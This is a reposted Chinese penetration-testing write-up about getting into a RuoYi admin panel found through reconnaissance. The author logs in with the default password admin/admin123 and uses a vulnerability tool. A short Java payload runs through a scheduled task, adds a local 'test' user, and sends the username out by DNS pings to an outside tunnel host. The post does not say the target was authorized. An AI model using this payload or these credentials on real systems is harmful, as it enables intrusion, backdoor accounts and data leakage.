若*后台管理系统渗透过程记录

admin 2023年5月1日03:39:59评论47 views字数 1213阅读4分2秒阅读模式
过前期的信息收集,发现了做个站点:

若*后台管理系统渗透过程记录

null
{width="5.763888888888889in" height="3.203472222222222in"}

没有验证码,再加上做个图标,吸引了我注意:

null
{width="0.6833333333333333in" height="0.7166666666666667in"}

1. 从弱口令开始

若依默认口令为admin/admin123,结果真的直接进了。

若*后台管理系统渗透过程记录

{width="5.766666666666667in" height="3.963888888888889in"}

管理员权限,直接上工具探测一下是否有若依的几个漏洞:

{width="5.767361111111111in" height="4.357638888888889in"}

若*后台管理系统渗透过程记录

还得是运气啊!原本想着直接用这个工具一键穿的,但是奈何没利用过若依的洞,这个工具也不会使用。后续去查看了几篇文章,需要上传jar包,该漏洞可通过定时任务去调用执行jar包

以下是java代码:

public AwesomeScriptEngineFactory() {    try {
      Runtime.getRuntime().exec("net user test test@123 /add");
      Runtime.getRuntime().exec("ping tttt.ogjxcqvtbf.dnstunnel.run");
      Runtime.getRuntime().exec("ping
  %USERNAME%.ogjxcqvtbf.dnstunnel.run");
    }catch (IOException e) {
       e.printStackTrace();
     }  }

2、工具获取

https://github.com/thelostworldFree/Ruoyi-All

若*后台管理系统渗透过程记录

本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!

敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。

原文始发于微信公众号(无问之路):若*后台管理系统渗透过程记录

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月1日03:39:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   若*后台管理系统渗透过程记录https://cn-sec.com/archives/1700776.html

发表评论

匿名网友 填写信息